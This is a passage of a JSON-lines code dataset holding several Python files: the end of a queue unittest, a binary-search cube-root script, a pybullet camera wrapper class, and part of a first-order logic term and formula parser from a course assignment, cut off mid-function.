QueueTest(unittest.TestCase):\n\n def test_get(self):\n with self.assertRaises(IndexError):\n queue.get()\n queue.put(4)\n queue.put(3)\n queue.put(5)\n self.assertEqual(queue.get(), 4)\n self.assertEqual(queue.get(), 3)\n self.assertEqual(queue.get(), 5)\n\n def test_put(self):\n with self.assertRaises(IndexError):\n queue1.put(1)\n queue1.put(3)\n queue1.put(4)\n\n def test_is_full(self):\n self.assertEqual(queue2.is_full(), True)\n self.assertEqual(queue.is_full(), False)\n\n def test_is_empty(self):\n 
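# queue2 was filled to capacity at module level, so it is not empty;\n # nothing has been added to queue1 by the time this test runs\n 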
self.assertEqual(queue2.is_empty(), False)\n self.assertEqual(queue1.is_empty(), True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Zadania_10/10.4.py","file_name":"10.4.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485980703","text":"\n#approximate cube root using binary search\nx = int(input(\"enter a perfect cube: \"))\n\n#allowable error\nepsilon = 0.01\nnumGuesses = 0;\n\nlow = 0.0\nhigh = x\n\nans = (high + low)/2.0\n\nwhile abs(ans**3 - x) >= epsilon and ans <= x:\n numGuesses += 1;\n if ans**3 < x:\n low = ans\n else:\n high = ans\n ans = (high + low)/2.0\nprint(str(ans) + \" is the approximate cube root of \" + str(x))\nprint(\"took \" + str(numGuesses) + \" guesses\")\n","sub_path":"lecture3/cube_root5.py","file_name":"cube_root5.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"110880222","text":"import numpy as np\nimport pybullet as pb\n\n\nclass Camera(object):\n def __init__(self, width, height, client_id):\n shape = (height, width)\n self._shape = shape\n self._world_pos = None\n self._proj_mat = None\n self._view_mat = None\n self._attach_link = None\n self._attach_pose = None\n self._render_options = {}\n self._render_flags = 0\n self._rgba = np.zeros(shape + (4, ), dtype=np.uint8)\n self._mask = np.zeros(shape, dtype=np.uint8)\n self._depth = np.zeros(shape, dtype=np.float32)\n self.avg_fps = []\n self.client_id = client_id\n self.infos = {}\n\n def project(self, fov, near, far):\n \"\"\" Apply camera projection matrix.\n Args:\n fov (float): Field of view.\n near (float): Near plane distance.\n far (float): Far plane distance.\n \"\"\"\n h, w = self.shape\n self._near_proj = near\n self._far_proj = far\n self._proj_mat = pb.computeProjectionMatrixFOV(\n fov=fov,\n aspect=w / h,\n nearVal=near,\n farVal=far,\n physicsClientId=self.client_id)\n\n self.infos.update(dict(\n fov=float(fov),\n aspect = w/h,\n near=near,\n far=far))\n\n def move_to(self, pos, orn):\n \"\"\" Move camera to a specified position in space.\n Args:\n pos (vec3): Camera eye position in Cartesian world coordinates.\n orn (vec4): Camera orientation, quaternion.\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n mat = pb.getMatrixFromQuaternion(orn)\n else:\n mat = pb.getMatrixFromQuaternion(orn)\n x, y, z = np.array(mat).reshape((3, 3)).T\n self._view_mat = pb.computeViewMatrix(\n cameraEyePosition=pos,\n cameraTargetPosition=pos + z,\n cameraUpVector=y,\n physicsClientId=self.client_id)\n\n def view_at(self, target, distance, yaw, pitch, roll=0., up='z'):\n \"\"\" Move camera to a specified position in space.\n Args:\n target (vec3): Target focus point in Cartesian world coordinates.\n distance (float): Distance from eye to focus point.\n yaw (float): Yaw angle in degrees left / right around up-axis.\n pitch (float): Pitch in degrees up / down.\n roll (float): Roll in degrees around forward vector.\n up (char): Axis up, one of x, y, z.\n \"\"\"\n self._view_mat = pb.computeViewMatrixFromYawPitchRoll(\n target,\n distance,\n yaw,\n pitch,\n roll,\n 'xyz'.index(up),\n physicsClientId=self.client_id)\n\n self.infos.update(dict(\n target=tuple(target),\n distance=float(distance),\n yaw=float(yaw),\n pitch=float(pitch),\n roll=float(roll)))\n\n def attach(self, link, pos=(0, 0, 0), orn=(0, 0, 0, 1)):\n \"\"\" Attach camera to a link in a specified position.\n Args:\n link 
(Link): Link to attach.\n pos (vec3): Camera eye position in link coord system.\n orn (vec4): Camera orientation.\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n self._attach_link = link\n self._attach_pose = pos, orn\n\n def shot(self):\n \"\"\" Computes an RGB image, a depth buffer and a segmentation mask buffer\n with body unique ids of visible objects for each pixel.\n \"\"\"\n\n h, w = self._shape\n renderer = pb.ER_BULLET_HARDWARE_OPENGL\n\n if self._attach_link is not None:\n pos, orn = self._attach_link.state.position\n # _attach_pose is a (pos, orn) tuple, so unpack it positionally\n pos, orn = pb.multiplyTransforms(\n pos, orn, *self._attach_pose,\n physicsClientId=self.client_id)\n self.move_to(pos, orn)\n\n # defaults below; values set via set_light_*()/casts_shadow() take\n # precedence, avoiding duplicate-keyword errors in getCameraImage\n render_kwargs = dict(\n lightDirection=(2, 0, 1),\n lightColor=(1, 1, 1),\n shadow=0)\n render_kwargs.update(self._render_options)\n\n w, h, rgba, depth, mask = pb.getCameraImage(\n width=w,\n height=h,\n projectionMatrix=self._proj_mat,\n viewMatrix=self._view_mat,\n renderer=renderer,\n flags=self._render_flags,\n physicsClientId=self.client_id,\n **render_kwargs)\n\n if not isinstance(rgba, np.ndarray):\n rgba = np.array(rgba, dtype=np.uint8).reshape((h, w, 4))\n depth = np.array(depth, dtype=np.float32).reshape((h, w))\n mask = np.array(mask, dtype=np.uint8).reshape((h, w))\n\n self._rgba, self._depth, self._mask = rgba, depth, mask\n # print('cam', sum(self.avg_fps)/len(self.avg_fps))\n\n @property\n def shape(self):\n \"\"\" Width and height tuple. \"\"\"\n return self._shape\n\n @property\n def mask(self):\n \"\"\" For each pixel, the visible object unique id (int).\n (!) Only available when using software renderer. \"\"\"\n return self._mask\n\n @property\n def rgba(self):\n \"\"\" List of pixel colors in R,G,B,A format, in range char(0..255)\n for each color. \"\"\"\n return self._rgba\n\n @property\n def rgb(self):\n \"\"\" List of pixel colors in R,G,B format, in range char(0..255)\n for each color. \"\"\"\n return self._rgba[:, :, :3]\n\n @property\n def gray(self):\n \"\"\" List of pixel grayscales, in range char(0..255). \"\"\"\n return np.dot(self.rgb, [0.299, 0.587, 0.114]).astype(np.uint8)\n\n @property\n def depth(self):\n \"\"\" Depth buffer, list of floats. \"\"\"\n near = self._near_proj\n far = self._far_proj # Camera near, far\n metric_depth = far * near / (far - (far - near) * self._depth)\n return metric_depth\n\n def depth_uint8(self, kn, kf):\n \"\"\" Depth buffer converted to range char(0..255). \"\"\"\n # kn = 0.35 # Realsense near\n # kf = 1.55 # Realsense far\n # kn = 0.5 # kinect1 near\n # kf = 1.8 # kinect1 far\n # kn is the camera (originally Kinect) near\n # kf is the camera (originally Kinect) far\n metric_depth = self.depth\n metric_depth[metric_depth <= kn] = kf\n # scale the clipped depths, not the raw ones, so values beyond kf\n # cannot overflow the uint8 range\n kinect_depth = np.clip(metric_depth, kn, kf)\n kinect_depth = (255 * (kinect_depth - kn) / (kf - kn)).astype(np.uint8)\n return kinect_depth\n\n def mask_link_index(self, flag):\n \"\"\" If enabled, the mask combines the object unique id and link index\n as follows: value = objectUniqueId + (linkIndex+1)<<24.\n \"\"\"\n if flag:\n self._render_flags |= pb.ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX\n else:\n self._render_flags &= ~pb.ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX\n\n def casts_shadow(self, flag):\n \"\"\" 1 for shadows, 0 for no shadows. \"\"\"\n self._render_options['shadow'] = 1 if flag else 0\n\n def set_light_direction(self, vec3):\n \"\"\" Light direction. \"\"\"\n self._render_options['lightDirection'] = vec3\n\n def set_light_color(self, vec3):\n \"\"\" Directional light color in [RED, GREEN, BLUE] in range 0..1. 
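Stored under the 'lightColor' render option that shot() forwards to getCameraImage(). 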
\"\"\"\n self._render_options['lightColor'] = vec3\n\n def set_light_distance(self, value):\n \"\"\" Distance of the light along the normalized light direction. \"\"\"\n self._render_options['lightDistance'] = value\n\n def set_light_ambient_coeff(self, valuem):\n \"\"\" Light ambient coefficient. \"\"\"\n self._render_options['lightAmbientCoeff'] = value\n\n def set_light_diffuse_coeff(self, value):\n \"\"\" Light diffuse coefficient. \"\"\"\n self._render_options['lightDiffuseCoeff'] = value\n\n def set_light_specular_coeff(self, value):\n \"\"\" Light specular coefficient. \"\"\"\n self._render_options['lightSpecularCoeff'] = value\n\n\nclass DebugCamera(object):\n @staticmethod\n def view_at(target, distance, yaw, pitch):\n \"\"\"\n Reset the 3D OpenGL debug visualizer camera.\n Args:\n target (vec3): Target focus point in Cartesian world coordinates.\n distance (float): Distance from eye to focus point.\n yaw (float): Yaw angle in degrees left / right around up-axis.\n pitch (float): Pitch in degrees up / down.\n \"\"\"\n pb.resetDebugVisualizerCamera(\n cameraTargetPosition=target,\n cameraDistance=distance,\n cameraYaw=yaw,\n cameraPitch=pitch)\n\n @staticmethod\n def get_position():\n \"\"\"\n Get position of the 3D OpenGL debug visualizer camera.\n Outputs:\n target (vec3): Target focus point in Cartesian world coordinates.\n distance (float): Distance from eye to focus point.\n yaw (float): Yaw angle in degrees left / right around up-axis.\n pitch (float): Pitch in degrees up / down.\n \"\"\"\n data = pb.getDebugVisualizerCamera()\n yaw = data[8]\n pitch = data[9]\n distance = data[10]\n target = data[11]\n return target, distance, yaw, pitch\n\n\nclass VRCamera(object):\n _pos = (0, 0, 0)\n _orn = (0, 0, 0, 1)\n\n @staticmethod\n def move_to(pos, orn):\n \"\"\"\n Move the VR camera to specified position.\n Args:\n pos (vec3): Camera eye position in default coord system.\n orn (vec4): Camera orientation (quaternion or Euler angles).\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n pb.setVRCameraState(rootPosition=pos, rootOrientation=orn)\n\n @staticmethod\n def move_step(pos, orn=(0, 0, 0, 1)):\n \"\"\"\n Move the VR camera by step.\n Args:\n pos (vec3): Linear step.\n orn (vec4): Angular (quaternion or Euler angles).\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n pos = np.add(VRCamera._pos, pos)\n _, orn = pb.multiplyTransforms((0, 0, 0), VRCamera._orn, (0, 0, 0),\n orn)\n VRCamera.move_to(pos, orn)\n","sub_path":"mime/scene/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":10127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486145380","text":"# (c) This file is part of the course\n# Mathematical Logic through Programming\n# by Gonczarowski and Nisan.\n# File name: predicates/syntax.py\n\n\"\"\"Syntactic handling of first-order formulas and terms.\"\"\"\n\nfrom __future__ import annotations\n\nfrom copy import deepcopy\nfrom typing import AbstractSet, Mapping, Optional, Sequence, Set, Tuple, Union\n\nfrom logic_utils import fresh_variable_name_generator, frozen\n\nfrom propositions.syntax import Formula as PropositionalFormula, \\\n is_variable as is_propositional_variable\nimport re\n\n\nclass ForbiddenVariableError(Exception):\n \"\"\"Raised by `Term.substitute` and `Formula.substitute` when a substituted\n term contains a variable name that is forbidden in that context.\"\"\"\n\n def __init__(self, variable_name: str) -> None:\n \"\"\"Initializes a 
`ForbiddenVariableError` from its offending variable\n name.\n\n Parameters:\n variable_name: variable name that is forbidden in the context in\n which a term containing it was to be substituted.\n \"\"\"\n assert is_variable(variable_name)\n self.variable_name = variable_name\n\n\ndef is_constant(s: str) -> bool:\n \"\"\"Checks if the given string is a constant name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a constant name, ``False`` otherwise.\n \"\"\"\n return (((s[0] >= '0' and s[0] <= '9') or (s[0] >= 'a' and s[0] <= 'd'))\n and s.isalnum()) or s == '_'\n\n\ndef is_variable(s: str) -> bool:\n \"\"\"Checks if the given string is a variable name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a variable name, ``False`` otherwise.\n \"\"\"\n return s[0] >= 'u' and s[0] <= 'z' and s.isalnum()\n\n\ndef is_function(s: str) -> bool:\n \"\"\"Checks if the given string is a function name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a function name, ``False`` otherwise.\n \"\"\"\n return s[0] >= 'f' and s[0] <= 't' and s.isalnum()\n\n\n@frozen\nclass Term:\n \"\"\"An immutable first-order term in tree representation, composed from\n variable names and constant names, and function names applied to them.\n\n Attributes:\n root (`str`): the constant name, variable name, or function name at the\n root of the term tree.\n arguments (`~typing.Optional`\\\\[`~typing.Tuple`\\\\[`Term`, ...]]): the\n arguments to the root, if the root is a function name.\n \"\"\"\n root: str\n arguments: Optional[Tuple[Term, ...]]\n\n def __init__(self, root: str,\n arguments: Optional[Sequence[Term]] = None) -> None:\n \"\"\"Initializes a `Term` from its root and root arguments.\n\n Parameters:\n root: the root for the term tree.\n arguments: the arguments to the root, if the root is a function\n name.\n \"\"\"\n if is_constant(root) or is_variable(root):\n assert arguments is None\n self.root = root\n else:\n assert is_function(root)\n assert arguments is not None\n self.root = root\n self.arguments = tuple(arguments)\n assert len(self.arguments) > 0\n\n def __repr__(self) -> str:\n \"\"\"Computes the string representation of the current term.\n\n Returns:\n The standard string representation of the current term.\n \"\"\"\n # Task 7.1\n if is_variable(self.root):\n return self.root\n elif is_constant(self.root):\n return self.root\n elif is_function(self.root): # for example- s(0) or f(s(0)) where s(0) is also function call\n output = self.root + '('\n for i in range(len(self.arguments)):\n output = output + self.arguments[i].__repr__() + \",\" # recursion\n return output[:len(output) - 1] + ')'\n else:\n pass\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is a `Term` object that equals the\n current term, ``False`` otherwise.\n \"\"\"\n return isinstance(other, Term) and str(self) == str(other)\n\n def __ne__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is not a `Term` object or does not\n equal the current term, ``False`` otherwise.\n \"\"\"\n return not self == other\n\n def __hash__(self) -> int:\n return hash(str(self))\n\n @staticmethod\n def parse_prefix(s: str) -> Tuple[Term, str]:\n \"\"\"Parses a prefix of the given 
string into a term.\n\n Parameters:\n s: string to parse, which has a prefix that is a valid\n representation of a term.\n\n Returns:\n A pair of the parsed term and the unparsed suffix of the string. If\n the given string has as a prefix a constant name (e.g., ``'c12'``)\n or a variable name (e.g., ``'x12'``), then the parsed prefix will be\n that entire name (and not just a part of it, such as ``'x1'``).\n \"\"\"\n # Task 7.3.1\n if s == \"\":\n return None, ''\n term, i = Term._parse_prefix_helper(s, 0)\n if term is not None:\n return term, s[i:]\n return None, ''\n\n @staticmethod\n def _parse_prefix_helper(string_to_parse: str, index: int) -> Tuple[Union[Term, None], Union[int, str]]:\n \"\"\"\n :param string_to_parse: String to parse (str).\n :param index: index (integer)\n :return: Term object.\n \"\"\"\n\n if is_variable(string_to_parse[index]) or is_constant(string_to_parse[index]):\n\n if string_to_parse[index] == '_': # const case that start with '_' so the root need to be '_'\n return Term(string_to_parse[index]), index + 1\n\n variable = string_to_parse[index]\n index += 1\n while index != len(string_to_parse) and string_to_parse[\n index].isalnum(): # a while loop to extract var name\n variable += string_to_parse[index]\n index += 1\n return Term(variable), index\n\n elif is_function(string_to_parse[index]):\n func_name = string_to_parse[index:string_to_parse.find(\"(\", index)] # extract function name\n index += len(func_name) + 1\n\n arguments = []\n while string_to_parse[index] != \")\": # extract function arguments\n if string_to_parse[index] == \",\":\n index += 1\n continue\n argument, index = Term._parse_prefix_helper(string_to_parse, index)\n arguments.append(argument)\n return Term(func_name, arguments), index + 1\n\n else:\n return None, ''\n\n @staticmethod\n def parse(s: str) -> Term:\n \"\"\"Parses the given valid string representation into a term.\n\n Parameters:\n s: string to parse.\n\n Returns:\n A term whose standard string representation is the given string.\n \"\"\"\n # Task 7.3.2\n term, string = Term.parse_prefix(s)\n return term\n\n def constants(self) -> Set[str]:\n \"\"\"Finds all constant names in the current term.\n\n Returns:\n A set of all constant names used in the current term.\n \"\"\"\n my_set = set()\n if is_constant(self.root):\n my_set.add(self.root)\n return my_set\n\n elif is_function(self.root):\n my_set = set()\n for argument in self.arguments:\n my_set = my_set.union(argument.constants())\n return my_set\n else:\n return set()\n\n def variables(self) -> Set[str]:\n \"\"\"Finds all variable names in the current term.\n\n Returns:\n A set of all variable names used in the current term.\n \"\"\"\n # Task 7.5.2\n my_set = set()\n if is_variable(self.root):\n my_set.add(self.root)\n return my_set\n\n elif is_function(self.root):\n my_set = set()\n for argument in self.arguments:\n my_set = my_set.union(argument.variables())\n return my_set\n else:\n return set()\n\n def functions(self) -> Set[Tuple[str, int]]:\n \"\"\"Finds all function names in the current term, along with their\n arities.\n\n Returns:\n A set of pairs of function name and arity (number of arguments) for\n all function names used in the current term.\n \"\"\"\n # Task 7.5.3\n\n if is_function(self.root):\n my_set = set()\n my_set.add((self.root, len(self.arguments)))\n for argument in self.arguments:\n my_set = my_set.union(argument.functions())\n return my_set\n else:\n return set()\n\n def substitute(self, substitution_map: Mapping[str, Term],\n forbidden_variables: 
AbstractSet[str] = frozenset()) -> Term:\n \"\"\"Substitutes in the current term, each constant name `name` or\n variable name `name` that is a key in `substitution_map` with the term\n `substitution_map[name]`.\n\n Parameters:\n substitution_map: mapping defining the substitutions to be\n performed.\n forbidden_variables: variables not allowed in substitution terms.\n\n Returns:\n The term resulting from performing all substitutions. Only\n constant names and variable names originating in the current term\n are substituted (i.e., those originating in one of the specified\n substitutions are not subjected to additional substitutions).\n\n Raises:\n ForbiddenVariableError: If a term that is used in the requested\n substitution contains a variable from `forbidden_variables`.\n\n Examples:\n >>> Term.parse('f(x,c)').substitute(\n ... {'c': Term.parse('plus(d,x)'), 'x': Term.parse('c')}, {'y'})\n f(c,plus(d,x))\n >>> Term.parse('f(x,c)').substitute(\n ... {'c': Term.parse('plus(d,y)')}, {'y'})\n Traceback (most recent call last):\n ...\n predicates.syntax.ForbiddenVariableError: y\n \"\"\"\n if is_variable(self.root) or is_constant(self.root):\n if self.root in substitution_map.keys():\n if substitution_map[self.root].root not in forbidden_variables:\n if is_function(substitution_map[self.root].root):\n self._check_forbidden_vars(substitution_map[self.root].arguments,\n forbidden_variables)\n return Term(substitution_map[self.root].root, substitution_map[self.root].arguments)\n else:\n return Term(substitution_map[self.root].root)\n else:\n raise ForbiddenVariableError(substitution_map[self.root].root)\n\n elif is_function(self.root):\n new_arguments_list = []\n for ind in range(len(self.arguments)):\n new_arguments_list.append(self.arguments[ind].substitute(substitution_map, forbidden_variables))\n return Term(self.root, tuple(new_arguments_list))\n\n if self.root in substitution_map.keys():\n return self._check_forbidden_vars(substitution_map[self.root].arguments, forbidden_variables)\n\n else:\n return self\n\n def _check_forbidden_vars(self, arguments, forbidden_variables):\n \"\"\"\n Helper for substitute. 
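Recursively walks nested function arguments. 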
Throws the exception if needed.\n \"\"\"\n for argument in arguments:\n if is_function(argument.root):\n return self._check_forbidden_vars(argument.arguments, forbidden_variables)\n else:\n if argument.root in forbidden_variables:\n raise ForbiddenVariableError(argument.root)\n\n\ndef is_equality(s: str) -> bool:\n \"\"\"Checks if the given string is the equality relation.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is the equality relation, ``False``\n otherwise.\n \"\"\"\n return s == '='\n\n\ndef is_relation(s: str) -> bool:\n \"\"\"Checks if the given string is a relation name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a relation name, ``False`` otherwise.\n \"\"\"\n return s[0] >= 'F' and s[0] <= 'T' and s.isalnum()\n\n\ndef is_unary(s: str) -> bool:\n \"\"\"Checks if the given string is a unary operator.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a unary operator, ``False`` otherwise.\n \"\"\"\n return s == '~'\n\n\ndef is_binary(s: str) -> bool:\n \"\"\"Checks if the given string is a binary operator.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a binary operator, ``False`` otherwise.\n \"\"\"\n return s == '&' or s == '|' or s == '->'\n\n\ndef is_quantifier(s: str) -> bool:\n \"\"\"Checks if the given string is a quantifier.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a quantifier, ``False`` otherwise.\n \"\"\"\n return s == 'A' or s == 'E'\n\n\n@frozen\nclass Formula:\n \"\"\"An immutable first-order term in tree representation, composed from\n relation names applied to first-order terms, and operators and\n quantifications applied to them.\n\n Attributes:\n root (`str`): the relation name, equality relation, operator, or\n quantifier at the root of the term tree.\n arguments (`~typing.Optional`\\\\[`~typing.Tuple`\\\\[`Term`, ...]]): the\n arguments to the root, if the root is a relation name or the\n equality relation.\n first (`~typing.Optional`\\\\[`Formula`]): the first operand to the root,\n if the root is a unary or binary operator.\n second (`~typing.Optional`\\\\[`Formula`]): the second\n operand to the root, if the root is a binary operator.\n variable (`~typing.Optional`\\\\[`str`]): the variable name quantified by\n the root, if the root is a quantification.\n predicate (`~typing.Optional`\\\\[`Formula`]): the predicate quantified by\n the root, if the root is a quantification.\n \"\"\"\n root: str\n arguments: Optional[Tuple[Term, ...]]\n first: Optional[Formula]\n second: Optional[Formula]\n variable: Optional[str]\n predicate: Optional[Formula]\n\n def __init__(self, root: str,\n arguments_or_first_or_variable: Union[Sequence[Term],\n Formula, str],\n second_or_predicate: Optional[Formula] = None) -> None:\n \"\"\"Initializes a `Formula` from its root and root arguments, root\n operands, or root quantified variable and predicate.\n\n Parameters:\n root: the root for the term tree.\n arguments_or_first_or_variable: the arguments to the the root, if\n the root is a relation name or the equality relation; the first\n operand to the root, if the root is a unary or binary operator;\n the variable name quantified by the root, if the root is a\n quantification.\n second_or_predicate: the second operand to the root, if the root is\n a binary operator; the predicate quantified by the root, if the\n root is a quantification.\n \"\"\"\n if is_equality(root) or 
is_relation(root):\n # Populate self.root and self.arguments\n assert second_or_predicate is None\n assert isinstance(arguments_or_first_or_variable, Sequence) and \\\n not isinstance(arguments_or_first_or_variable, str)\n self.root, self.arguments = \\\n root, tuple(arguments_or_first_or_variable)\n if is_equality(root):\n assert len(self.arguments) == 2\n elif is_unary(root):\n # Populate self.first\n assert isinstance(arguments_or_first_or_variable, Formula) and \\\n second_or_predicate is None\n self.root, self.first = root, arguments_or_first_or_variable\n elif is_binary(root):\n # Populate self.first and self.second\n assert isinstance(arguments_or_first_or_variable, Formula) and \\\n second_or_predicate is not None\n self.root, self.first, self.second = \\\n root, arguments_or_first_or_variable, second_or_predicate\n else:\n assert is_quantifier(root)\n # Populate self.variable and self.predicate\n assert isinstance(arguments_or_first_or_variable, str) and \\\n is_variable(arguments_or_first_or_variable) and \\\n second_or_predicate is not None\n self.root, self.variable, self.predicate = \\\n root, arguments_or_first_or_variable, second_or_predicate\n\n def __repr__(self) -> str:\n \"\"\"Computes the string representation of the current term.\n\n Returns:\n The standard string representation of the current term.\n \"\"\"\n # Task 7.2\n if is_function(self.root) or is_constant(self.root) or is_variable(self.root):\n return str(self)\n elif is_unary(self.root): # ~x\n return \"~\" + self.first.__repr__()\n elif is_quantifier(self.root): # Ax[Ex..]\n return self.root + self.variable + \"[\" + self.predicate.__repr__() + \"]\"\n elif is_binary(self.root): # (x&y)\n return \"(\" + self.first.__repr__() + self.root + self.second.__repr__() + \")\"\n elif is_equality(self.root): # x=y\n return self.arguments[0].__repr__() + self.root + self.arguments[1].__repr__()\n elif is_relation(self.root): # R(X,Y,Z)\n output = self.root + \"(\"\n for i in range(len(self.arguments)):\n output += self.arguments[i].__repr__() + \",\"\n if not self.arguments:\n return output + \")\"\n return output[:len(output) - 1] + \")\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is a `Formula` object that equals the\n current term, ``False`` otherwise.\n \"\"\"\n return isinstance(other, Formula) and str(self) == str(other)\n\n def __ne__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is not a `Formula` object or does not\n equal the current term, ``False`` otherwise.\n \"\"\"\n return not self == other\n\n def __hash__(self) -> int:\n return hash(str(self))\n\n @staticmethod\n def parse_prefix(s: str) -> Tuple[Formula, str]:\n \"\"\"Parses a prefix of the given string into a term.\n\n Parameters:\n s: string to parse, which has a prefix that is a valid\n representation of a term.\n\n Returns:\n A pair of the parsed term and the unparsed suffix of the string.\n If the given string has as a prefix a term followed by an equality\n followed by a constant name (e.g., ``'c12'``) or by a variable name\n (e.g., ``'x12'``), then the parsed prefix will include that entire\n name (and not just a part of it, such as ``'x1'``).\n \"\"\"\n # Task 7.4.1\n if s == '':\n return None, ''\n formula, remainder = Formula._parse_prefix_helper(s)\n return formula, 
remainder\n\n @staticmethod\n def _parse_prefix_helper(s: str) -> Tuple[Formula, str]:\n \"\"\"\n Helper method for the method Formula.parse_prefix(s: str).\n :param s: string to parse.\n :return: Tuple of term object and string (a remainder).\n \"\"\"\n first_char = s[0]\n\n if is_constant(first_char):\n t1, remainder = Term.parse_prefix(s)\n if len(remainder) > 0:\n if remainder[0] == '=':\n parsed_remainder = Term.parse_prefix(remainder[1:])\n return Formula('=', [t1, parsed_remainder[0]]), parsed_remainder[1]\n return t1, remainder\n\n elif is_variable(first_char):\n t1, remainder = Term.parse_prefix(s)\n if remainder[0] == '=':\n t2, remainder2 = Term.parse_prefix(remainder[1:])\n return Formula('=', [t1, t2]), remainder2 # Changed this line at ex8\n\n elif is_function(first_char):\n t1, remainder = Term.parse_prefix(s)\n if remainder[0] == '=':\n t2, remainder2 = Term.parse_prefix(remainder[1:])\n return Formula('=', [t1, t2]), remainder2\n\n elif is_relation(first_char):\n return Formula._helper_parse_prefix_is_relation(s)\n\n elif first_char == '(':\n return Formula._helper_parse_prefix_is_parenthesis(s)\n\n elif is_quantifier(first_char):\n return Formula._helper_parse_prefix_is_quantifier(s)\n\n elif is_unary(first_char):\n return Formula._helper_parse_prefix_is_unary(s)\n\n else:\n raise Exception('Omers Exception: Undefined operation')\n\n @staticmethod\n def _helper_parse_prefix_is_quantifier(s):\n \"\"\"\n Helper.\n \"\"\"\n quantifier, index = s[0], 1\n variable = s[index]\n while is_variable(variable + s[index + 1]): # Getting variable name.\n index += 1\n variable += s[index]\n index += 2 # Skip the squared parentheses.\n formula = s[index]\n index += 1\n square_parentheses_counter = 1\n while square_parentheses_counter != 0 and index < len(s):\n if s[index] == '[':\n square_parentheses_counter += 1\n elif s[index] == ']':\n square_parentheses_counter -= 1\n\n if square_parentheses_counter == 0:\n break\n\n formula += s[index]\n index += 1\n if index >= len(s) - 1:\n return Formula(quantifier, variable, Formula._parse_prefix_helper(formula)[0]), ''\n return Formula(quantifier, variable, Formula._parse_prefix_helper(formula)[0]), s[index + 1:]\n\n @staticmethod\n def _helper_parse_prefix_is_parenthesis(s):\n \"\"\"\n Helper.\n \"\"\"\n parentheses_counter, ind_of_closer, ind_of_op = 1, 0, 0 # ind of the ')' and ind of the operator.\n char_ind = 1\n while parentheses_counter != 0:\n if (is_binary(s[char_ind]) or is_binary(s[char_ind: char_ind + 2])) and parentheses_counter == 1:\n ind_of_op = char_ind\n elif s[char_ind] == '(':\n parentheses_counter += 1\n elif s[char_ind] == ')':\n parentheses_counter -= 1\n char_ind += 1\n ind_of_closer = char_ind - 1\n operator = s[ind_of_op] if (is_unary(s[ind_of_op]) or s[ind_of_op] in ['&', '|']) else s[\n ind_of_op: ind_of_op + 2]\n first_part = s[1: ind_of_op]\n second_part = s[ind_of_op + 2: ind_of_closer] if operator == '->' else s[ind_of_op + 1: ind_of_closer]\n return Formula(operator, Formula._parse_prefix_helper(first_part)[0],\n Formula._parse_prefix_helper(second_part)[0]), s[ind_of_closer + 1:]\n\n @staticmethod\n def _helper_parse_prefix_is_relation(s):\n \"\"\"\n Helper.\n \"\"\"\n if len(s) == 1 or '(' not in s:\n return Formula(s, []), ''\n r, index = s[0], 1\n try:\n while s[index] != '(':\n r += s[index]\n index += 1\n except IndexError:\n print('a')\n term, remainder = Term.parse_prefix(s[index + 1:])\n terms = [term] if term is not None else None\n\n if term is None:\n return Formula(r, []), s[index + 2:]\n\n while 
remainder[0] != ')':\n term, remainder = Term.parse_prefix(remainder[1:])\n terms.append(term)\n if len(remainder) == 1:\n return Formula(r, terms), ''\n return Formula(r, terms), remainder[1:]\n\n @staticmethod\n def _helper_parse_prefix_is_unary(s):\n \"\"\"\n Helper.\n \"\"\"\n if is_variable(s[1]):\n parsed_remainder = Formula._parse_prefix_helper(s[1:])\n s = '~' + str(parsed_remainder[0]) + parsed_remainder[1]\n return Formula('~', parsed_remainder[0]), parsed_remainder[1]\n\n else:\n remained_formula = s[1:]\n return Formula('~', Formula._parse_prefix_helper(remained_formula)[0]), \\\n Formula._parse_prefix_helper(remained_formula)[1]\n\n @staticmethod\n def parse(s: str) -> Formula:\n \"\"\"Parses the given valid string representation into a term.\n\n Parameters:\n s: string to parse.\n\n Returns:\n A term whose standard string representation is the given string.\n \"\"\"\n # Task 7.4.2\n formula, string = Formula.parse_prefix(s)\n return formula\n\n def constants(self) -> Set[str]:\n \"\"\"Finds all constant names in the current term.\n\n Returns:\n A set of all constant names used in the current term.\n \"\"\"\n # Task 7.6.1\n constants_to_return = set()\n if is_unary(self.root):\n constants_to_return = constants_to_return.union(self.first.constants())\n return constants_to_return\n elif is_binary(self.root):\n constants_to_return = constants_to_return.union(self.first.constants())\n constants_to_return = constants_to_return.union(self.second.constants())\n elif is_relation(self.root):\n for argument in self.arguments:\n constants_to_return = constants_to_return.union(argument.constants())\n elif is_quantifier(self.root):\n constants_to_return = constants_to_return.union(self.predicate.constants())\n elif is_equality(self.root):\n for argument in 